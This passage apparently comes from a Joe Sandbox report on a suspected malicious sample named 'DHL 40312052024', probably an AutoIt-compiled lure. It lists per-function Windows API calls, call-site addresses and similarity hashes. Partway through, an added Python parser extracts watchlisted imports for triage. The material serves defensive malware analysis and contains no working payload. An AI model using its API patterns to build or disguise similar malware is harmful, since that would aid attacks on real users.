                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction ID: c9a7d03a69129fb21c1205db9de79c9d515a9628e1e731cebd5db1cd813016b4
                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction Fuzzy Hash: 31014B7244A18ABBCF1A5F85CC05CEE3F62BB2C395B588415FE1858031D23AC9B1EB81
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 0083B2E4
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083B2FC
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083B320
                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0083B33B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 357397906-0
                                                                                    • Opcode ID: 23d9bad3e3c65f3ba7e99bd4411f25e56e3940070b6288f3c3950151185c192a
                                                                                    • Instruction ID: 506423bbee2e4f0d2ad8bc91cfeacf9f8a569fdfc373345e8293ad19ffbd3ae0
                                                                                    • Opcode Fuzzy Hash: 23d9bad3e3c65f3ba7e99bd4411f25e56e3940070b6288f3c3950151185c192a
                                                                                    • Instruction Fuzzy Hash: E71147B5D00609EFDB41DF99C4459EEBBF5FF58310F104166E914E3220D735AA558F90
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0083B644
                                                                                    • _memset.LIBCMT ref: 0083B653
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00876F20,00876F64), ref: 0083B682
                                                                                    • CloseHandle.KERNEL32 ref: 0083B694
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3277943733-0
                                                                                    • Opcode ID: e109c392cf7ba40ec4eaa1074bf5ab10dcb7c8c4714006c13b25ded3ef683020
                                                                                    • Instruction ID: dfbdf1fd30ef0060a851d3e56824d8b446a2fe90586b71f4caca4b829f1c633c
                                                                                    • Opcode Fuzzy Hash: e109c392cf7ba40ec4eaa1074bf5ab10dcb7c8c4714006c13b25ded3ef683020
                                                                                    • Instruction Fuzzy Hash: 70F054B1640700BEE21027617C0AF7B3A5CFB15355F004421FB0CE6197EB758C6587A8
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00816BE6
                                                                                      • Part of subcall function 008176C4: _memset.LIBCMT ref: 008176F9
                                                                                    • _memmove.LIBCMT ref: 00816C09
                                                                                    • _memset.LIBCMT ref: 00816C16
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00816C26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 48991266-0
                                                                                    • Opcode ID: 6bb4f45c7242e2bdbf46cfeacc362a3bf600fbdf960b228e9255f98cae745aec
                                                                                    • Instruction ID: 374b33a88b1ff2044994b0eea3768fb70599330bb80bb570657f5fb20c31a788
                                                                                    • Opcode Fuzzy Hash: 6bb4f45c7242e2bdbf46cfeacc362a3bf600fbdf960b228e9255f98cae745aec
                                                                                    • Instruction Fuzzy Hash: 90F03A3A200100ABCF016F55DC89A8ABB2AFF85321F088065FE089E267C775E851CBB5
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 007B2231
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 007B223B
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 007B2250
                                                                                    • GetStockObject.GDI32(00000005), ref: 007B2258
                                                                                    • GetWindowDC.USER32(?,00000000), ref: 007EBE83
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007EBE90
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 007EBEA9
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 007EBEC2
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 007EBEE2
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007EBEED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: ea770effd97fbe45c102fe0c2caa866f6babb37faf838f2c36ee0cdb7c7f6da1
                                                                                    • Instruction ID: cb2f6757921f8f1fed60e1b15ca13f6ae338bf2c5d8334dd7a0a0f308f263329
                                                                                    • Opcode Fuzzy Hash: ea770effd97fbe45c102fe0c2caa866f6babb37faf838f2c36ee0cdb7c7f6da1
                                                                                    • Instruction Fuzzy Hash: 62E03932904284AADF225F64FC0DBD83F10FB45336F008366FB69880E287B14980DB52
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 0080871B
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,008082E6), ref: 00808722
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008082E6), ref: 0080872F
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,008082E6), ref: 00808736
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: d759fa07255971ba6d99e4883a3aa08a0f7d07bf7938b69a0231157ddcc5f4d1
                                                                                    • Instruction ID: 502a8d34f58aaf0aac14ed39ad9c8e340b0a84605a5a4522849c6d0973c3c9f1
                                                                                    • Opcode Fuzzy Hash: d759fa07255971ba6d99e4883a3aa08a0f7d07bf7938b69a0231157ddcc5f4d1
                                                                                    • Instruction Fuzzy Hash: 21E04F36A11211DBDB605FB55D0CB563BA8FF90792F144C28B385C9092DB2484818790
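The entry above (GetCurrentThread, OpenThreadToken, then GetCurrentProcess, OpenProcessToken) is the usual pattern for reading the caller's own access token: try the thread token first, fall back to the process token. Entries like it are buried among thousands of per-function records in this report, and each record has the same bullet layout (an "APIs" list with "ref:" addresses, then "Similarity" fields such as API ID, String ID and Opcode ID). The parser below is an added example written for this page, not part of the Joe Sandbox report and not Joe Security's own tooling. It assumes only the bullet layout visible here; the sample text is constructed from three entries on this page, and the TRIAGE_APIS watchlist is a hypothetical choice of which imports an analyst wants pulled out first.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Similarity' records and triage them by API.

Added example for this report page; assumes the bullet layout shown on the page.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the report's own layout, copied from entries on this page.
SAMPLE_ENTRIES = """\
APIs
• GetCurrentThread.KERNEL32 ref: 0080871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,008082E6), ref: 00808722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008082E6), ref: 0080872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,008082E6), ref: 00808736
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: d759fa07255971ba6d99e4883a3aa08a0f7d07bf7938b69a0231157ddcc5f4d1
• Instruction ID: 502a8d34f58aaf0aac14ed39ad9c8e340b0a84605a5a4522849c6d0973c3c9f1
APIs
  • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
• __wcsnicmp.LIBCMT ref: 0081B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0081B0F6
Strings
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
APIs
• _memset.LIBCMT ref: 0082259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008225D4
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
"""

# Hypothetical watchlist: imports worth reading first when triaging a dropper.
TRIAGE_APIS = {"OpenThreadToken", "OpenProcessToken", "InternetCrackUrlW", "WNetUseConnectionW"}

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Similarity fields; the value may be empty (e.g. "• String ID:").
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                   # raw argument tokens as printed ("?" = unresolved)
    ref: int                     # address of the call site
    subcall_of: Optional[int]    # callee address when the call is one level down, else None


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_entries(text):
    """Split the report text into one FunctionEntry per 'APIs' record."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":           # every record starts with this heading
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            current.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                        int(m["sub"], 16) if m["sub"] else None))
            continue
        m = FIELD_LINE.match(line)
        if m:
            current.fields[m["key"]] = m["val"]
    return entries


def find_entries_calling(entries, api_names, include_subcalls=False):
    """Return entries that call any of api_names directly (or via subcalls if requested)."""
    wanted = set(api_names)
    return [e for e in entries
            if any(c.name in wanted and (include_subcalls or c.subcall_of is None)
                   for c in e.apis)]


def summarize(entry, api_names=TRIAGE_APIS):
    """One-line triage string: 'API ID: MODULE!Api@callsite, ...' for watchlisted direct calls."""
    wanted = set(api_names)
    hits = [f"{c.module}!{c.name}@{c.ref:08X}"
            for c in entry.apis if c.name in wanted and c.subcall_of is None]
    return f"{entry.fields.get('API ID', '?')}: " + ", ".join(hits)


if __name__ == "__main__":
    for e in find_entries_calling(parse_entries(SAMPLE_ENTRIES), TRIAGE_APIS):
        print(summarize(e))
```

Run it against the full report text (the records are plain text once the "Download File" link captions are ignored) to list every function that touches a watchlisted import together with its Opcode ID, which is the value to pivot on when comparing this AutoIt runtime against other samples. Subcall lines are kept but excluded from matching by default, since the report attributes them to the callee rather than to the function being described.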
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0080B4BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContainedObject
                                                                                    • String ID: AutoIt3GUI$Container
                                                                                    • API String ID: 3565006973-3941886329
                                                                                    • Opcode ID: 80227accced7b5f3bdb6af9069a5d4437436d58e96b8143a1fb33a29d5d2f4b6
                                                                                    • Instruction ID: de2c92839672147772ea2f0527a511b5f1d5afeb4d284c4b81bd4c9a08b0b267
                                                                                    • Opcode Fuzzy Hash: 80227accced7b5f3bdb6af9069a5d4437436d58e96b8143a1fb33a29d5d2f4b6
                                                                                    • Instruction Fuzzy Hash: A0913670600605AFDB54DF68C884B6ABBF9FF49714F20856EE94ACB3A1DB71E841CB50
                                                                                    APIs
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • __wcsnicmp.LIBCMT ref: 0081B02D
                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0081B0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                    • String ID: LPT
                                                                                    • API String ID: 3222508074-1350329615
                                                                                    • Opcode ID: 627879891e003f8515462e6fb205e1bc0eb8b7bd7ec69b50bc73f8df13193508
                                                                                    • Instruction ID: 55ad417439c731e49394accd6dd39bb556095de7547810bade1cbbac9366565d
                                                                                    • Opcode Fuzzy Hash: 627879891e003f8515462e6fb205e1bc0eb8b7bd7ec69b50bc73f8df13193508
                                                                                    • Instruction Fuzzy Hash: DE614A75A00219EFCB14DB94D895EEEB7B9FF08310F114069F916EB2A1D774AE80CB91
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 007C2968
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 007C2981
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: af523975b813e4b3e151e48759dfa4f031f608ea5dbddff707b5d80198200e9c
                                                                                    • Instruction ID: a13c1504c0689b736e06d48cb5fe6c26f3363261457dbef961cf80cb6650f089
                                                                                    • Opcode Fuzzy Hash: af523975b813e4b3e151e48759dfa4f031f608ea5dbddff707b5d80198200e9c
                                                                                    • Instruction Fuzzy Hash: 35515472408744DBD320EF10D88ABEFBBE8FB85345F41885DF2E9411A1DB349569CB66
                                                                                    APIs
                                                                                      • Part of subcall function 007B4F0B: __fread_nolock.LIBCMT ref: 007B4F29
                                                                                    • _wcscmp.LIBCMT ref: 00819824
                                                                                    • _wcscmp.LIBCMT ref: 00819837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                    • String ID: FILE
                                                                                    • API String ID: 4029003684-3121273764
                                                                                    • Opcode ID: 08f8d289859993fdf1fe64f8f1beb3b6a014dcada18c542a29a6ef4f36aff440
                                                                                    • Instruction ID: f893952a0ac39de2e20539f5d47d625ed846cc88b9edb17d212d0098080bd002
                                                                                    • Opcode Fuzzy Hash: 08f8d289859993fdf1fe64f8f1beb3b6a014dcada18c542a29a6ef4f36aff440
                                                                                    • Instruction Fuzzy Hash: 3841A871A00219BADF219FA4CC59FEFB7BDEF85710F010479F904E7281DA75A9448B61
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0082259E
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008225D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset
                                                                                    • String ID: |
                                                                                    • API String ID: 1413715105-2343686810
                                                                                    • Opcode ID: 31bd61843df01399ac433e789669475ceb2e4e7f5aa9d82eabf35850cc32f478
                                                                                    • Instruction ID: 58cb48ae0a50e900d42780db5ed8c31831601cfa3979c7593c1dd5c8be751acb
                                                                                    • Opcode Fuzzy Hash: 31bd61843df01399ac433e789669475ceb2e4e7f5aa9d82eabf35850cc32f478
                                                                                    • Instruction Fuzzy Hash: B0313971800119EBDF05EFA0DC89EEEBFB8FF18310F100069F914A6162EB355956DB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00837B61
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00837B76
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: 7c136c05873b7ac22c11d87abd3035281482706dd7198e6ddeb5791f9a4387fa
                                                                                    • Instruction ID: 3361efd29e8b5b402ca8ca9877e30b985cbe28c0bbf98a6abb29237afed21011
                                                                                    • Opcode Fuzzy Hash: 7c136c05873b7ac22c11d87abd3035281482706dd7198e6ddeb5791f9a4387fa
                                                                                    • Instruction Fuzzy Hash: D841FAB4A0521A9FDB24CF64C981BDABBB5FB49314F14016AE904EB391D770E951CF90
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00836B17
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00836B53
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: 2ea8b1e2e3ec36b274dcee45275020a9db6d3ac883dc674ac44bdabc8a1b70b3
                                                                                    • Instruction ID: cd27851ff5bb78292c0f31ae0e2cf95da916aed85e0ded641c57c464486d03ed
                                                                                    • Opcode Fuzzy Hash: 2ea8b1e2e3ec36b274dcee45275020a9db6d3ac883dc674ac44bdabc8a1b70b3
                                                                                    • Instruction Fuzzy Hash: CA318171200604AEDB109F68CC41BFB77B9FF88764F10C619FAA5D7191EA35AC91CBA0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00812911
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0081294C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 4efb9f0a66ade3ea85ba8e237d62d96016c49b3d81f26a66ae023541c6a96227
                                                                                    • Instruction ID: 7756aa2d88b9a6dfbe7944454d6e96760e6d21119a8d533ec2c1698780d660ff
                                                                                    • Opcode Fuzzy Hash: 4efb9f0a66ade3ea85ba8e237d62d96016c49b3d81f26a66ae023541c6a96227
                                                                                    • Instruction Fuzzy Hash: 2731AE71A00309ABEB288F5CC885FEEBFBDFF45350F140069E985E61A1D77099A4CB51
APIs
• __snwprintf.LIBCMT ref: 00823A66
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: __snwprintf_memmove
